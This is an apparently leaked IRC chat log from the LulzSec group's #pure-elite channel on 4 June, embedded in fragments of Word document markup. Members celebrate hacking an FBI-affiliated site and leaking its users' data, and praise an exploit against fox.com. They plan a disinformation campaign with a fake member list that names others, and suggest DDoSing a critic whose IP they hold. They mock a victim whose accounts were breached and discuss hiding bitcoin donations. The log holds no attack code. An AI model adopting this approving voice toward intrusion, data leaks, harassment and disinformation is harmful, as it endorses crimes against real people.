        <w:t>Jun 04 07:45:25 joepie91 about the server config Jun 04 07:45:42 tflow yes Jun 04 07:45:43 tflow true Jun 04 07:45:48 tflow it wasn't a big hack Jun 04 07:50:35 tflow http://www.gmanews.tv/story/222563/technology/hackers- taunt-fbi-after-hitting-partner-sites Jun 04 07:50:40 tflow LulzSec said that since the Obama administration treats hacking as an act of war, we just hacked an FBI-affiliated website and leaked its user base." Jun 04 07:50:43 tflow I love that line Jun 04 07:52:12 joepie91 my god..... http://codepad.viper-7.com/XeOvIU Jun 04 07:52:21 joepie91 some people should learn to format their fucking code Jun 04 07:52:32 joepie91 I reformatted it for him &gt;.&gt; Jun 04 07:52:34 joepie91 http://codepad.viper-7.com/S0XZCg Jun 04 07:54:13 lol lol Jun 04 07:56:30 joepie91 like, srsly Jun 04 07:56:33 joepie91 that code was just horrible Jun 04 07:56:37 joepie91 and so many fails in such a simple script Jun 04 07:56:38 joepie91 :| Jun 04 07:58:19 joepie91 gave him a link to w3schools Jun 04 07:58:24 joepie91 and told him to learn how to format code Jun 04 07:59:20 lol xD Jun 04 07:59:21 tflow lol why would you want a function that returns 1-3 Jun 04 07:59:29 tflow according to the params Jun 04 07:59:44 tflow script* Jun 04 08:00:13 joepie91 idk Jun 04 08:00:16 joepie91 he's learning javascript Jun 04 08:00:21 joepie91 "from a book" apparently Jun 04 08:00:31 joepie91 which is typically a horrible idea with a language like javascript Jun 04 08:00:41 joepie91 because standards can change quite a lot over a short timespan Jun 04 08:00:54 joepie91 ohwell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:01:01 joepie91 he's now apparently going to follow the w3schools guide Jun 04 08:01:04 joepie91 instead of the book Jun 04 08:01:06 joepie91 so all will be fine Jun 04 08:01:56 joepie91 whoo Jun 04 08:02:03 joepie91 just found a really clever bit on a forum Jun 04 08:02:05 joepie91 "After uninstalling Firefox 3 times, I finally figured out a way to get rid of Norton. In the Mozilla Firefox components folder there is a file called: coFFPlgn.dll. I overwrote the coFFPlgn.dll with a blank file and then set it to read only. That got rid of the Norton Firefox Tool Bar." Jun 04 08:02:47 tflow that's how i got rid of license scripts on php scripts Jun 04 08:03:43 tflow someone payed me $20 to overwrite a file with blank data once Jun 04 08:03:47 joepie91 lolol Jun 04 08:04:09 joepie91 also, just saying Jun 04 08:04:18 joepie91 http://blockexplorer.com/address/176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 04 08:04:29 joepie91 you could probably write a nice small donation counter using that :) Jun 04 08:22:35 joepie91 http://pastebin.com/rrZDkbp7 Jun 04 08:22:44 joepie91 Avunit Sabu tflow lol Topiary Jun 04 08:22:46 joepie91 read pastebin Jun 04 08:24:18 Topiary see, now that's the entire HBGary crew Jun 04 08:24:21 Topiary so why is your name in it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:25:46 joepie91 probably because I was in the leaked logs? Jun 04 08:25:53 joepie91 anyway, is entropy still here under some nick? Jun 04 08:25:58 Topiary nope Jun 04 08:26:10 joepie91 also, it was tweeted by Awinee Jun 04 08:26:12 joepie91 a few minutes ago Jun 04 08:26:16 Topiary let's just ignore it Jun 04 08:26:21 Topiary been ignoring them all for days Jun 04 08:26:22 joepie91 so I think he just grepped the #hq logs then Jun 04 08:26:38 Topiary it's fine if we just stay here and don't expose ourselves in other locations Jun 04 08:26:41 Topiary they can't do anything Jun 04 08:27:15 * trollpoll (rootgratz@HA-fdp.dgc.42rdv5.IP) has joined #pure-elite Jun 04 08:27:18 lol we should do a mass disinfo campaingn :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:27:19 Topiary 'sides this is Pure Elite not LulzSec, heh luckily our gang of awesome development folks working in side-ops didn't get on that list Jun 04 08:27:28 joepie91 lol Jun 04 08:28:07 lol lets add the lulzsec.com domain adrian lamo owns and awiness dox and some other jesterfags to a pastebin and call it "lulzsec members" then pastebin spam it so it trends like pr0's :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:28:16 trollpoll lol, i was thinking just on this Jun 04 08:28:20 lol or you think doing tht will give them more reason to think it is us?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:28:22 trollpoll but, saying more or less Jun 04 08:28:26 trollpoll that lulzsec is CIA Jun 04 08:28:31 Topiary hmm not sure who IS LulzSec really...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>tflow/Sabu/myself/kayla started it, then tflow was on/off, then Avunit/pwnsauce joined in, then you guys came onboard... :D I guess nobody and everybody Jun 04 08:29:14 Topiary let's spread disinfo about CIA I guess Jun 04 08:29:28 tflow yeah but props to trollpoll for exploiting that fox.com hole Jun 04 08:29:30 trollpoll it makes sense Jun 04 08:29:34 Topiary oh definitely yeah Jun 04 08:29:41 Topiary we have trollpoll to thank for the first hit Jun 04 08:29:49 Topiary very good shit Jun 04 08:30:05 trollpoll not all mine...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:30:14 Topiary word is that you exploited it up nicely Jun 04 08:30:37 trollpoll but i lost the lulz :( Jun 04 08:30:55 Topiary "awinee Awinee Jun 04 08:30:55 Topiary I'll dedicate this day to @avunitanon. @LulzSec watch closely as I sink your humble boat. Nothing personal, just #lulz. Read next tweet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:30:55 Topiary " Jun 04 08:30:57 Topiary 2 minutes ago Jun 04 08:30:58 * Topiary watches Jun 04 08:31:19 joepie91 well shit Jun 04 08:31:21 joepie91 I have to get bread Jun 04 08:31:25 joepie91 but I dun want to miss the lulz Jun 04 08:31:25 joepie91 :( Jun 04 08:31:49 Topiary Awinee has no fucking idea what the word "humble" means Jun 04 08:32:16 joepie91 maybe you should tell him about the humble bundle Jun 04 08:32:20 Topiary he's not charismatic, he's not skilled, he's not funny, he's not smart, he's ugly and out of shape, and he wakes up at 2 in the afternoon every day Jun 04 08:32:22 joepie91 for further confuse :D Jun 04 08:32:22 * Topiary shakes head Jun 04 08:32:23 Topiary poor boy Jun 04 08:33:55 trollpoll Topiary, about CIA, will make sense to ppl, cos in fact makes sense to me Jun 04 08:34:18 trollpoll as far as i know, one of you could be some CIA guy Jun 04 08:34:36 Topiary it's true Jun 04 08:34:36 trollpoll using "hackers" to their benefits Jun 04 08:34:48 trollpoll attacking iran Jun 04 08:34:57 trollpoll lybia Jun 04 08:35:00 trollpoll or whatever Jun 04 08:35:04 trollpoll is CIA style Jun 04 08:35:17 trollpoll also, makes the hackers thing they are freelance :) Jun 04 08:35:39 trollpoll but ey, if one of you is a cia guy... cmon, no problem, we are for lulz xD Jun 04 08:35:52 Topiary if I were CIA I'd certainly be looking for a crew like this Jun 04 08:36:03 trollpoll sure Jun 04 08:36:05 Topiary seriously if you gave us all a schedule, office building, and paycheques Jun 04 08:36:09 Topiary we'd just destroy the world Jun 04 08:36:36 trollpoll well, in a not far future, perhaps we will end at it... Jun 04 08:36:57 Topiary hehe Jun 04 08:37:00 trollpoll i mean... the whitehat security companies started like this...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:37:26 Topiary don't even know why I've got a tab open on @Awinee and his twitter feed, here comes the failed d0x...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:38:18 Topiary I really hope one of you is awinee so everyone can have something fun to read Jun 04 08:38:25 Topiary maybe Gawker will go over our logs and make a lame story Jun 04 08:39:05 tflow gawker is a joke Jun 04 08:39:18 tflow their design made them lose alot of their visitors Jun 04 08:39:19 Topiary tflow: did you see Chen's tweet about us being HBGay crew?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:39:25 tflow completely dropped them out of google news Jun 04 08:39:25 tflow yeah Jun 04 08:41:48 tflow we could just ddos him Jun 04 08:41:51 tflow we have his ip Jun 04 09:01:22 tflow i love this guy Jun 04 09:01:23 tflow http://www.youtube.com/watch?v=59Wm00Q6s7c Jun 04 09:02:09 tflow the same guy like 5 years later: http://www.youtube.com/watch?v=G5v0kwXapt0 Jun 04 09:21:53 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 09:22:14 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 09:35:47 joepie91 Clever (Score:1) Jun 04 09:35:47 joepie91 by asto21 (1797450) Jun 04 09:35:47 joepie91 Take a site down first and then make sure it stays down by slashdotting it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:35:50 joepie91 lolol Jun 04 09:37:10 tflow where's that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:38:06 joepie91 slashdot Jun 04 09:38:08 joepie91 it's frontpage Jun 04 09:38:10 joepie91 right now Jun 04 09:38:14 joepie91 like, top article Jun 04 09:38:22 tflow ah lol Jun 04 09:38:24 joepie91 also, either slashdot and boingboing are having issues Jun 04 09:38:28 joepie91 or I am getting ddos _again_ Jun 04 09:39:00 &lt;hsien&gt; yo Jun 04 09:39:19 * hsien gives channel operator status to joepie91 lol tflow storm Topiary trollpoll Jun 04 09:39:47 joepie91 my laptop doesn't get +o? :( Jun 04 09:39:55 joepie91 :P Jun 04 09:39:56 Topiary your laptop is a terrorist Jun 04 09:40:04 joepie91 terrorists don't run on Pentium 3s Jun 04 09:40:20 * joepie91 gives channel operator status to joepie91_laptop Jun 04 09:42:55 joepie91 so Jun 04 09:43:05 joepie91 VPN Jun 04 09:43:09 joepie91 recommendations?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:43:10 joepie91 inb4 HMA Jun 04 09:43:13 Topiary HMA Jun 04 09:44:00 joepie91 lol Jun 04 09:44:04 joepie91 what are the speeds on HMA?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:44:20 joepie91 like, will I be able to burst the full 1,8MB/sec of my connection?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:45:10 Topiary I believe you'll manage Jun 04 09:45:21 Topiary also, I just got a 32GB MicroSD for 40 Jun 04 09:45:51 Topiary first I thought it would totally be a scam and would be one of those shitty 1GBs Jun 04 09:45:53 Topiary just plugged it in Jun 04 09:45:57 Topiary 29.7GB :D Jun 04 09:46:05 joepie91 microsd isn't very expensive Jun 04 09:46:07 joepie91 but Topiary Jun 04 09:46:10 joepie91 what kind of speeds do you get?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:46:13 * lol has quit (Ping timeout: 121 seconds) Jun 04 09:46:27 Topiary I'm running on 4mbps here and it maxes that Jun 04 09:46:36 joepie91 mmm Jun 04 09:46:40 joepie91 oh Jun 04 09:46:42 joepie91 fuck Jun 04 09:46:43 joepie91 liberty reserve Jun 04 09:46:44 joepie91 is shitty Jun 04 09:46:46 joepie91 beyond belief Jun 04 09:47:22 Topiary Account Balance is: 25.09 BTC (429.04 USD @ 17.10) Jun 04 09:47:23 Topiary u jelly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:47:49 joepie91 http://bitpoll.dyndns.org/?poll=3 Jun 04 09:47:50 joepie91 u jelly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:48:21 joepie91 and no I don't have all those bitcoins anymore :P Jun 04 09:48:33 * lol (lol@HA-q3c.mcg.9puaba.IP) has joined #pure-elite Jun 04 09:48:46 tflow i bet you wish you kept them Jun 04 09:48:49 Topiary I sent you 0.3 Jun 04 09:48:52 Topiary on tflow's /r/ Jun 04 09:49:11 joepie91 tflow: yes, but I had bills to pay Jun 04 09:49:12 joepie91 sadly Jun 04 09:49:18 joepie91 Topiary: :D Jun 04 09:49:23 * joepie91 tries to find transaction Jun 04 09:49:37 Topiary 2011-06-03 15:11:17 coingobbler 1PPVupRRz7tH... - 0.30 Jun 04 09:49:37 joepie91 17:24 yesterday Jun 04 09:49:39 joepie91 (my time) Jun 04 09:49:49 Topiary our biggest single donation: Jun 04 09:49:50 joepie91 oh lolwut Jun 04 09:49:50 Topiary 2011-06-04 05:19:14 Bitcoin P2P Network coingobbler 13.40 Jun 04 09:49:52 joepie91 time difference Jun 04 09:49:55 joepie91 and wut dat Jun 04 09:50:01 tflow If I kept that 25 bc you gave me 2 months ago, I'd be like $300 richer Jun 04 09:50:05 Topiary someone sent us 150USD in one donation Jun 04 09:50:06 joepie91 lol Jun 04 09:50:11 joepie91 lolwat Jun 04 09:50:15 joepie91 nice Jun 04 09:50:20 Topiary time to spam your asses Jun 04 09:50:21 Topiary 2011-06-04 13:40:07 Bitcoin P2P Network coingobbler 0.05 Jun 04 09:50:21 Topiary 2011-06-04 12:38:23 Bitcoin P2P Network coingobbler 0.52 Jun 04 09:50:21 Topiary 2011-06-04 05:19:14 Bitcoin P2P Network coingobbler 13.40 Jun 04 09:50:21 Topiary 2011-06-04 04:16:58 Bitcoin P2P Network coingobbler 0.01 Jun 04 09:50:21 Topiary 2011-06-04 02:19:00 Bitcoin P2P Network coingobbler 1.90 Jun 04 09:50:22 Topiary 2011-06-04 01:15:16 Bitcoin P2P Network coingobbler 1.00 Jun 04 09:50:24 Topiary 2011-06-03 18:03:53 Bitcoin P2P Network coingobbler 0.99 Jun 04 09:50:26 Topiary 2011-06-03 15:11:17 coingobbler 1PPVupRRz7tH... - 0.30 Jun 04 09:50:28 Topiary 2011-06-03 10:49:24 Bitcoin P2P Network coingobbler 2.01 Jun 04 09:50:30 Topiary 2011-06-03 08:50:34 Bitcoin P2P Network coingobbler 0.02 Jun 04 09:50:32 Topiary 2011-06-03 07:51:23 Bitcoin P2P Network coingobbler 1.00 Jun 04 09:50:34 Topiary 2011-06-03 05:57:29 Bitcoin P2P Network coingobbler 0.06 Jun 04 09:50:38 Topiary 2011-06-03 05:02:08 Bitcoin P2P Network coingobbler 0.55 Jun 04 09:50:39 joepie91 just curious... why are you using a web wallet? Jun 04 09:50:40 Topiary 2011-06-03 03:02:08 Bitcoin P2P Network coingobbler 0.01 Jun 04 09:50:42 Topiary 2011-06-03 02:06:34 Bitcoin P2P Network coingobbler 0.12 Jun 04 09:50:44 Topiary 2011-06-02 22:13:15 Bitcoin P2P Network coingobbler 3.26 Jun 04 09:50:46 Topiary 2011-06-02 22:13:14 Bitcoin P2P Network coingobbler 0.04 Jun 04 09:50:48 Topiary 2011-05-31 04:11:41 Bitcoin P2P Network CoinGobbler 0.05 Jun 04 09:50:50 Topiary 2011-05-31 02:46:10 Bitcoin P2P Network CoinGobbler 0.03 Jun 04 09:50:52 Topiary 2011-05-30 23:22:21 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:50:54 Topiary 2011-05-28 22:34:45 Bitcoin P2P Network CoinGobbler 0.05 Jun 04 09:50:56 Topiary 2011-05-28 22:06:44 1NFEkB8NYkLS... CoinGobbler 0.26 Jun 04 09:50:58 Topiary 2011-05-13 19:30:28 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:51:00 Topiary 2011-05-04 04:43:20 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:51:02 Topiary om nom nom nom goins Jun 04 09:51:04 Topiary because client = IP Jun 04 09:51:09 joepie91 true Jun 04 09:51:17 joepie91 but Jun 04 09:51:18 Topiary I don't buy anything with this wallet Jun 04 09:51:21 joepie91 that doesn't make it traceable Jun 04 09:51:21 joepie91 afaik Jun 04 09:51:25 Topiary if we need to buy things, I shift it to someone else Jun 04 09:51:41 joepie91 everyone "has" the coins, but you can only "use" them if you have the private key of the address Jun 04 09:51:58 joepie91 so you can't see "oh this transaction went to IP X" Jun 04 09:52:12 joepie91 it's like you have the key, and noone knows you do Jun 04 09:52:15 joepie91 someone makes a chest with money Jun 04 09:52:21 joepie91 gives everyone a copy of that chest Jun 04 09:52:26 joepie91 but you are the only one who can open the chest as you have the key Jun 04 09:52:37 joepie91 however, noone knows you have the key, nor that you opened the chest Jun 04 09:53:08 joepie91 at least that is my understanding of how it works :P Jun 04 09:54:47 joepie91 goddamnit Jun 04 09:54:48 joepie91 http://members.shaw.ca/gf3/circle-the-cat.html Jun 04 09:56:42 tflow i remember playing that a few years ago Jun 04 09:56:55 Avunit i has it Jun 04 09:56:57 Avunit finally Jun 04 09:56:59 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 09:56:59 Avunit bitch cat D: Jun 04 09:57:04 joepie91 lolol Jun 04 09:57:10 joepie91 Avunit: you won?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:57:14 Avunit yesh Jun 04 09:57:20 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 09:57:27 Avunit after 6 tries D: Jun 04 09:57:35 joepie91 jesus Jun 04 09:57:36 joepie91 you're good Jun 04 09:57:48 Avunit well Jun 04 09:57:50 Avunit i failed hard again now Jun 04 09:58:21 Avunit argh so close now :( Jun 04 09:58:45 Avunit ah got it again Jun 04 09:59:18 joepie91 lolwat Jun 04 09:59:19 joepie91 you are good Jun 04 09:59:41 Avunit imma upload pic Jun 04 09:59:42 Avunit secs Jun 04 09:59:53 Avunit before i ensnare it Jun 04 10:00:36 Avunit http://i.imgur.com/NrQWr.jpg Jun 04 10:00:46 Avunit gotta use those green dots you start out with Jun 04 10:01:39 joepie91 FUCKING CAT Jun 04 10:01:40 joepie91 I know Jun 04 10:01:51 joepie91 but I can't win it Jun 04 10:01:51 joepie91 D: Jun 04 10:01:57 Avunit lolwat Jun 04 10:02:02 Avunit only 3 darkgreen dots nao Jun 04 10:02:06 joepie91 I tried like 20 times Jun 04 10:02:08 joepie91 couldn't win Jun 04 10:02:09 Avunit the challenge is accepted D: Jun 04 10:02:09 joepie91 I sad nao :( Jun 04 10:02:13 joepie91 and lol Jun 04 10:02:23 Avunit wut its not running away from my cricle Jun 04 10:02:25 Avunit in previous tries Jun 04 10:02:30 Avunit it like ran the opposite direction Jun 04 10:02:37 Avunit of where id put the first circle Jun 04 10:02:38 joepie91 also Jun 04 10:02:38 joepie91 http://pete.com/files/photos/challenge-denied.jpg Jun 04 10:02:43 Avunit so id drive im to the nearest cluster Jun 04 10:02:46 Avunit now it just ran past it D: Jun 04 10:02:48 joepie91 lol Jun 04 10:02:51 joepie91 but look at that image Jun 04 10:03:04 Avunit ACCEPTED Jun 04 10:04:17 joepie91 http://pete.com/view/during-a-blackout Jun 04 10:05:29 Avunit haha Jun 04 10:07:44 joepie91 you know Jun 04 10:07:50 joepie91 people are seriously supportive of lulzsec it seems Jun 04 10:07:53 joepie91 like Jun 04 10:07:59 joepie91 they somehow seem to support lulzsec more than anonymous Jun 04 10:08:12 lol lol Jun 04 10:08:12 joepie91 which is Jun 04 10:08:14 joepie91 interesting Jun 04 10:08:18 joepie91 seeing as the most heard argument was Jun 04 10:08:23 joepie91 BUT THEY ARE COMMITTING CRIMES!!1!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 10:08:29 Avunit yeah but it is mainly because we dont really use any shitty motives n stuff its just lulz and i mean Jun 04 10:08:31 Avunit everyone had to laugh Jun 04 10:08:35 Avunit when tupac was ressurected Jun 04 10:08:49 trollpoll lol Jun 04 10:08:51 joepie91 yes, but the "it's a crime" argument goes here as well Jun 04 10:08:59 joepie91 so it would make no sense to judge anon based on that argument Jun 04 10:08:59 Avunit yeah but everyone found it funny :p Jun 04 10:09:03 joepie91 if you don't do the same for lulzsec Jun 04 10:09:04 joepie91 :p Jun 04 10:09:14 joepie91 tl;dr people are hypocritical and have double standards Jun 04 10:09:15 joepie91 what's new Jun 04 10:09:26 Avunit that is from an objective, non brain interferance point of view Jun 04 10:09:45 joepie91 @ekgibson Jun 04 10:09:45 joepie91 Emily Gibson Jun 04 10:09:45 joepie91 @LulzSec You proved your point, but did you have to publish everything? Thanks for fucking my day. Fb, amazon,everything hacked. Kiss my ass Jun 04 10:09:46 joepie91 lol Jun 04 10:09:52 joepie91 shouldnthavereusedpasswords.jpeg Jun 04 10:10:02 lol lol Jun 04 10:10:04 lol :D Jun 04 10:10:10 Avunit tis just like saying you dont discriminate but scientifically its proven that one simply looks at some things like colour, weight, build etc. first :P Jun 04 10:10:12 lol should make tht an actual image xD Jun 04 10:10:39 joepie91 lol Jun 04 10:10:58 joepie91 Avunit: humans aren't perfect.. but if you are aware of that...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 10:11:03 joepie91 then don't claim you are Jun 04 10:11:06 joepie91 as in Jun 04 10:11:23 joepie91 if you like what lulzsec does, but not what anon does, then don't use the "it's a crime" argument at all Jun 04 10:11:44 joepie91 on another note, lulzsec has turned quite some attention to cloudflare and bitcoin it seems :p Jun 04 10:11:47 Avunit Most people are not aware or dont want to be :/ Which is not necessarily bad Jun 04 10:11:59 Avunit and awinee is promoting avunit.com! :O Jun 04 10:12:08 Avunit So i know Jun 04 10:12:11 Avunit we save money Jun 04 10:12:21 Avunit and then we make a tv commercial with shouldnthavereusedpassword.jpeg to inform the public! :D Jun 04 10:13:40 joepie91 lol Jun 04 10:14:03 joepie91 god Jun 04 10:14:09 joepie91 gawker couldnt possible have made a worse picture mashup Jun 04 10:14:11 joepie91 for their article Jun 04 10:14:13 joepie91 http://gawker.com/5808517/lulzsec-hackers-go-after- fbi-affiliates?utm_source=twitterfeed&amp;utm_medium=twitter Jun 04 10:17:37 Topiary wow that's hideous Jun 04 10:20:55 joepie91 ya Jun 04 10:20:56 joepie91 it is Jun 04 10:29:15 sabu yo Jun 04 10:37:18 * trollpoll has quit (A TLS packet with unexpected length was received.) Jun 04 10:39:38 * t[2] (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 10:43:14 * Topiary has quit (Ping timeout: 121 seconds) Jun 04 10:43:17 * t[2] is now known as Topiary Jun 04 10:43:36 * Topiary has quit (Quit: TANGO OSCAR PAPA INDIA ALPHA ROMEO YANKEE TACTICAL BARREL ROLL) Jun 04 10:43:43 * Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 10:50:05 * Topiary has quit (Quit: sec) Jun 04 10:50:52 * Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 11:08:57 joepie91 Topiary Jun 04 11:08:58 joepie91 you here?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:10:50 Topiary yeah Jun 04 11:11:31 joepie91 can you generate a new bitcoin address?\ Jun 04 11:11:34 joepie91 someone wants to donate Jun 04 11:11:39 joepie91 but doesn't want his transaction to show up Jun 04 11:11:42 joepie91 on the "normal" address Jun 04 11:11:43 sabu trueeeee Jun 04 11:11:53 Topiary joepie91: can you take the donation and then forward it to me?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:11:56 joepie91 idk if the wallet you use allows multiple addresses Jun 04 11:11:57 joepie91 and yes Jun 04 11:12:03 joepie91 but it will still be sort of traceable Jun 04 11:12:12 joepie91 there's just an extra hop Jun 04 11:12:15 Topiary I don't want to change my one as it's on like 150K viewing pastebins Jun 04 11:12:19 joepie91 nono Jun 04 11:12:21 joepie91 just make an extra one Jun 04 11:12:25 joepie91 just for this transaction Jun 04 11:12:27 Topiary don't think you can do that Jun 04 11:12:28 joepie91 idk if your wallet allows it Jun 04 11:12:35 Topiary hmm nope Jun 04 11:12:39 joepie91 in the normal client you can.. in fact it's recommended to make a new address for every transaction Jun 04 11:12:40 Topiary how much is he donating?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:12:40 tflow why not just use the bitcoin client?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
